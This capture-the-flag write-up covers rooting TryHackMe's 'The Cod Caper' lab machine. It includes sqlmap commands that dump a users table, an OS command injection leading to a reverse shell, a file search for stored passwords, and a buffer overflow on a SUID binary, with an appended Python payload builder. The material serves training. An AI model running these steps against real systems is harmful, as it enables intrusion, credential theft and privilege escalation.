In this article we are going to solve another boot2root challenge, The Cod Caper from TryHackMe. The machine can be deployed by visiting the URL https://tryhackme.com/room/thecodcaper
IP address: 10.10.47.170
The first step is to scan the target with nmap to find open ports and services.
command used : nmap -sC -sV -Pn 10.10.47.170
We have two open ports, 80 and 22, so we start by enumerating port 80. It serves the Apache2 Ubuntu Default Page, and the page source does not reveal anything useful. So we decided to run a directory brute-force attack. I used the wfuzz tool because I like its clean interface (you can use any tool you want).
command used : wfuzz -c -z file,/usr/share/wordlists/dirb/big.txt --hc 404 http://10.10.47.170/FUZZ.php
We got something interesting: opening the discovered page in the browser shows a login form.
Here we tried SQL injection using the tool sqlmap.
command used : sqlmap --url http://10.10.47.170/administrator.php --dbs --forms
With this we can easily find the names of the databases; next we select one of them to find the tables present in it.
The users database looks interesting, so we list the tables inside it with the command
sqlmap --url http://10.10.47.170/administrator.php --forms -D users --tables
Now we have everything we need: in the next command we just specify the database and table name and dump all the data in the users table
sqlmap --url http://10.10.47.170/administrator.php --forms -D users -T users --dump-all
We now have the password of user pingudad; let's use these credentials to log into the admin panel.
We can run commands here, which is clearly an OS command injection vulnerability. Executing id returns www-data. We then ran a simple Python reverse-shell one-liner through the same input and got a reverse shell.
There are two users on the box and we need the password of user pingu. We could search for it manually, or use the find utility as
find / -user "www-data" -name "*" 2>/dev/null
After running this command we found that the password is located in /var/hidden/pass.
Using those credentials we are in as user pingu.
Next we checked the user's privileges and found nothing useful, so let's check for SUID binaries using the command
This looks interesting. We used gdb to analyze the binary more carefully and found that it is vulnerable to a buffer overflow.
Using the command r < <(cyclic 50) we are able to overwrite the EIP register.
After that we need to find the exact byte offset at which the program crashed.
We are almost done; now we have to find the memory address of the shell function so that we can redirect execution there and run the command we want.
readelf -s /opt/secret/root | grep shell
Now we just have to build our payload and send it to the binary; after that we got the hashes of two users, root and papa.
We cracked these hashes with john and got the password for both users.
We used little-endian format for the address when creating our payload.
We are root now, and this completes the challenge :)
NOTE: the use of the cyclic command is described on the TryHackMe website; you can read about it there.
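The cyclic pattern and little-endian steps above, as an added example that is not part of the original write-up: a small pure-Python reimplementation of what cyclic and cyclic_find do, plus the padding-and-address layout of the payload. The crash value 0x6161616c and the return address used in the demo are constructed placeholders, not values from the room.

```python
# Added example (not from the original write-up): how the "cyclic" pattern
# locates the EIP offset, and why the address must be packed little-endian.
import string
import struct
from itertools import islice


def de_bruijn(alphabet=string.ascii_lowercase, n=4):
    """Yield a de Bruijn sequence: every n-character window is unique."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            if n % p == 0:
                for idx in a[1:p + 1]:
                    yield alphabet[idx]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    return db(1, 1)


def cyclic(length):
    """Same output as pwntools' `cyclic <length>` with default options."""
    return "".join(islice(de_bruijn(), length))


def cyclic_find(eip, max_len=4096):
    """Map the crashed EIP value (as shown by gdb) back to its pattern offset.

    EIP holds the 4 pattern bytes in little-endian order, so unpack them the
    same way before searching; -1 means the value did not come from the pattern.
    """
    window = struct.pack("<I", eip).decode("ascii", errors="replace")
    return cyclic(max_len).find(window)


def build_payload(offset, ret_addr):
    """Pad up to the saved return address, then overwrite it (little-endian).

    ret_addr would be the value `readelf -s` reported for the target function;
    the address used below is a constructed placeholder.
    """
    return b"A" * offset + struct.pack("<I", ret_addr)


if __name__ == "__main__":
    crash_eip = 0x6161616C  # constructed: pretend gdb showed EIP = 0x6161616c
    off = cyclic_find(crash_eip)
    print(cyclic(50), off, build_payload(off, 0x08048540).hex())
```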